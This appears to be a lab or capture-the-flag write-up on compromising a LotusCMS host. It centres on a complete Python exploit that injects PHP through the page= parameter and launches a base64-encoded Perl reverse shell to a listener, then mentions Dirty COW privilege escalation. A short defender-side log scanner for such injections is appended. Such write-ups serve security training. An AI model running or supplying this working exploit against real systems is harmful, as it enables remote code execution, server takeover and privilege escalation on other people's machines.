Target machine practice
1. Scanning the target host shows that port 80 is open and serving a web application.
The login page reveals LotusCMS.
Searching exploit-db for LotusCMS turns up a remote code execution vulnerability: https://www.exploit-db.com/exploits/18565. The EXP provided there is an msfconsole module (as discussed before, we try not to rely on metasploit), which could be used directly, but here we write our own exp to obtain a shell.
from requests import get
import re
import random
from urllib import parse
import base64
import threading

# Generate a random 10-letter marker used to confirm that injected code ran
def gen_string():
    key = ""
    for i in range(10):
        key += chr(random.randint(65, 90))
    return key

# Check whether the vulnerability exists
def check(target):
    if "http" not in target:
        target = "http://" + target  # was "http" + target, which built an invalid URL
    result = get(target)
    # LotusCMS links its pages as index.php?page=<name>
    find = re.search(r'<a.*href=[\'|"](/*index.php)\?.*(page=\w+)[\'|"].*>', result.text)
    if find is None:
        print("[*] INFO: Not found vulnerability.")
        return 0
    key = gen_string()
    # Close the page string and inject a PHP echo of the marker; the rest is commented out
    target += "index.php?page=index');" + parse.quote("echo '" + key + "';//")
    res = get(target)
    if key in res.text:
        print("[!] INFO: Find vul!!!")
        return True
    print("[*] INFO: Not found vulnerability.")
    return 0

def exp(target, host, port):
    poc = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (host, port)
    # base64-encode the command; decode to str so the PHP literal becomes '...' rather than b'...'
    poc = base64.b64encode(poc.encode('utf-8')).decode('ascii')
    target += "index.php?page=index');" + parse.quote("system(base64_decode('%s'));//" % poc)
    print("[~] Confirm: please run 'nc -lvp %s' on your client" % port)
    input("\t|--- Please press any key to start!")
    # The HTTP request blocks for as long as the reverse shell stays open, so send it from a thread
    threading.Thread(target=get, args=(target,)).start()
    print("[?] INFO: Get shell?")
    print("[!] INFO: If the attack succeeded, the request thread stays blocked while the shell is open...")
    exit(0)

# target : the target URL (must end with a trailing /)
# host : lhost, the address the reverse shell connects back to
# port : lport
target = "http://192.168.29.133/"
host = "192.168.29.129"
port = "4444"
if check(target):
    exp(target, host, port)
Run the script:
With nc listening on the kali box, the shell comes back successfully.
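From the defender's side, as an added example that is not part of the original writeup: this Python scans Apache-style access-log lines (constructed here) for the kind of page= injection the script above sends. Anything other than a plain page name is flagged together with the quoting characters and PHP functions it contains; the log format and the index.php?page= URL shape are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample Apache access-log lines (not from the original page): a benign
# page request, the marker-echo probe, and a base64-wrapped system() call.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=index%27%29%3Becho%20%27ABCDEFGHIJ%27%3B%2F%2F HTTP/1.1" 200 310
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=index%27%29%3Bsystem%28base64_decode%28cGVybA%3D%3D%29%29%3B%2F%2F HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
# Characters and PHP functions that have no place in a LotusCMS page name.
SUSPICIOUS = re.compile(r"""['")(;]|\b(system|passthru|shell_exec|exec|eval|base64_decode)\b""", re.I)

def indicators(decoded_value):
    """Return the sorted, de-duplicated indicators found in a decoded page= value."""
    return sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(decoded_value)})

def scan_log(text):
    """Return (ip, decoded page value, indicators) for every request whose page=
    parameter is not a plain page name, which is all LotusCMS ever expects."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("uri"))
        if not parts.path.endswith("index.php"):
            continue
        # Split the raw query ourselves: an injected ';' must not be treated as a separator
        for pair in parts.query.split("&"):
            name, _, raw = pair.partition("=")
            if name != "page":
                continue
            value = unquote(raw)
            if re.fullmatch(r"\w+", value):
                continue  # ordinary page name
            hits.append((m.group("ip"), value, indicators(value)))
    return hits

if __name__ == "__main__":
    for ip, value, found in scan_log(SAMPLE_LOG):
        print(f"{ip}: page={value!r} indicators={found}")
```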
Privilege escalation
Checking for usable privilege-escalation vulnerabilities (with linux-exploit-suggester) shows that Dirty COW can be used to escalate privileges.
Privilege escalation succeeded.
Log in with ssh.